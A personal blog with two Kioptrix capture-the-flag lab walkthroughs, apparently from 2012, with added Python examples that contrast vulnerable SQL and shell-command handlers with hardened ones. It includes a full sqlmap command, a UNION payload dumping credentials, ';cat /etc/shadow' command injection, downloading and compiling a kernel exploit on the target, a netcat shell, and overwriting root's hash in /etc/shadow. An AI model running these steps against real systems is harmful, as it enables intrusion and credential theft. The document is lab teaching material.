Monday, November 19, 2012

Lab 6 Kioptrix Level 3

Information Gathering



Service Enumeration

Based on the nmap scan (screenshot above), I found open ports on the target, among them 22 (ssh) and 80 (http).

Vulnerability Assessment

Here I tried to inject the login form, but it did not work.



So I went to http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos instead
and tried to inject the id parameter.


Exploit

Here I used sqlmap to exploit the injection in the id parameter:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -p id --dbs --level=3 --risk=4 --threads=8



sqlmap found three databases.
I then enumerated the tables in the gallery database to see what was available.


It found seven tables; the interesting one is dev_accounts, so I dumped that table.


The dump contained the password of the user loneferret, so I tried it to log in over ssh.
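Why the id parameter was injectable, and what sqlmap is actually doing when it probes it, as an added example that is not part of the original post or of the gallery application's own code. The in-memory SQLite database, its photos table and the two dev_accounts rows are constructed for the demonstration and are assumptions, not the real contents of the gallery database. The vulnerable query pastes the request parameter into the SQL string; the hardened version type-checks it and binds it as a parameter.

```python
import sqlite3

# Constructed sample data (assumption): a tiny stand-in for the gallery
# database, with a photos table and the dev_accounts table named in the post.
SCHEMA = """
CREATE TABLE photos (photoid INTEGER, title TEXT, filename TEXT);
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO photos VALUES (1, 'Sunset', 'sunset.jpg');
INSERT INTO photos VALUES (2, 'Beach', 'beach.jpg');
INSERT INTO dev_accounts VALUES (1, 'loneferret', 'constructed_hash_1');
INSERT INTO dev_accounts VALUES (2, 'devuser', 'constructed_hash_2');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_gallery(conn: sqlite3.Connection, photo_id: str) -> list:
    """Vulnerable pattern: the raw id query parameter is concatenated into SQL.
    Anything after the number is executed as part of the statement."""
    sql = "SELECT photoid, title, filename FROM photos WHERE photoid=" + photo_id
    return conn.execute(sql).fetchall()


def safe_gallery(conn: sqlite3.Connection, photo_id: str) -> list:
    """Hardened: the parameter must be an integer and is bound, never spliced."""
    if not photo_id.isdigit():
        raise ValueError("photo id must be a positive integer")
    sql = "SELECT photoid, title, filename FROM photos WHERE photoid=?"
    return conn.execute(sql, (int(photo_id),)).fetchall()


def looks_injectable(query_fn, conn: sqlite3.Connection, base_id: str = "1") -> bool:
    """Boolean-based probe of the kind sqlmap sends first: append a true and a
    false condition; if the two responses differ, the parameter is evaluated as SQL."""
    try:
        true_rows = query_fn(conn, base_id + " AND 1=1")
        false_rows = query_fn(conn, base_id + " AND 1=2")
    except ValueError:
        return False          # input rejected before reaching the database
    return true_rows != false_rows


# UNION payload: three columns to match the original SELECT, so rows from
# dev_accounts come back where the gallery expects photo rows.
UNION_PAYLOAD = "1 UNION SELECT id, username, password FROM dev_accounts"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable injectable:", looks_injectable(vulnerable_gallery, db))
    print("hardened injectable:  ", looks_injectable(safe_gallery, db))
    for row in vulnerable_gallery(db, UNION_PAYLOAD):
        print(row)
```

The boolean probe is the same idea as sqlmap's detection phase; the UNION payload is the manual equivalent of `--dump` once the column count is known. The hardened query refuses the payload before it ever reaches the database.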



It worked: I was logged into the server.
In loneferret's home directory I also found an interesting file.



The file says that a newly installed program for editing, creating and viewing files is available, and that it should be run with the command 'sudo ht'. So this is an editor, and loneferret is allowed to run it as root through sudo.
Since the editor runs as root, I used it to open /etc/shadow.


In that file I replaced root's password hash with loneferret's hash, so that root's password became loneferret's password.


It worked, and I am root now.



Alhamdulillah ....:D

Saturday, November 17, 2012

Lab 5 Kioptrix Level 2



Information Gathering





Service Enumeration

Based on the nmap scan (screenshot above), I found several open ports: 22 (ssh), 80 (http), 111 (rpcbind), 443 (ssl/http), 631 (ipp) and 3306 (mysql).

Vulnerability Assessment

Here I tried to inject the login form, and it worked.


I was redirected straight to the administrative web console.

Exploit

The console runs a system command on the value submitted, so I used a command injection attack vector.
First I looked at the kernel information.

Now I knew that the server runs kernel 2.6.9. Then I tried to read /etc/passwd and /etc/shadow, but ;cat /etc/shadow did not work: the injected command runs as the web server user, which is not allowed to read that file.
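What the web console is doing under the hood, as an added example that is not the post's own code nor the Kioptrix application's: a handler that pastes the submitted host into a shell command line, beside two hardened versions. The handler, the command string and the inputs are assumptions; `echo` stands in for `ping` so that the example runs offline, and the `;` injection works the same way because the shell splits the command line before the program ever sees it.

```python
import ipaddress
import shlex
import subprocess


def vulnerable_ping(host: str) -> str:
    """Vulnerable pattern: user input is concatenated into a shell command.
    echo stands in for ping (assumption) so this runs offline; with shell=True
    the shell parses ';' first, so '127.0.0.1; id' runs id as the web user."""
    cmd = "echo pinging " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def quoted_ping(host: str) -> str:
    """Partial fix: shell-quote the input. The shell still runs, but the whole
    value is one literal argument, so metacharacters lose their meaning."""
    cmd = "echo pinging " + shlex.quote(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_ping(host: str) -> str:
    """Preferred fix: validate the input as an IP address and pass an argv
    list, so no shell is involved at all and nothing can be injected."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        raise ValueError("not an IP address: %r" % host) from None
    argv = ["echo", "pinging", str(addr)]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


# Constructed payload (assumption) of the same shape as the post's ';cat /etc/shadow'.
PAYLOAD = "127.0.0.1; echo INJECTED"


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_ping(PAYLOAD)))
    print("quoted:    ", repr(quoted_ping(PAYLOAD)))
    try:
        hardened_ping(PAYLOAD)
    except ValueError as exc:
        print("hardened:   rejected:", exc)
```

The vulnerable handler prints a second line produced by the injected command; the quoted version echoes the payload back as harmless text; the hardened version rejects it before anything runs. Note that even the vulnerable version only runs the injected command with the web server's privileges, which is exactly why reading /etc/shadow fails and a local privilege escalation is still needed.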



Then I searched for a local exploit for kernel 2.6.x and copied it to /var/www/ on my attacking machine, so the target could download it over http.





Then, through the command injection, I downloaded it to /tmp on the target machine and compiled it there.

 
 we can see that the file exploit (9545.c) has been succeded. So execute it.

But I was still running as the apache user from the web console. I needed an interactive shell on the server so I could run the exploit from inside it, so I used the command injection to start netcat listening on port 1234.


Then I connected to it with nc 192.168.56.101 1234 and executed the exploit from that shell (rooting).



The exploitation succeeded, and I am root now.

Alhamdulillah.... :D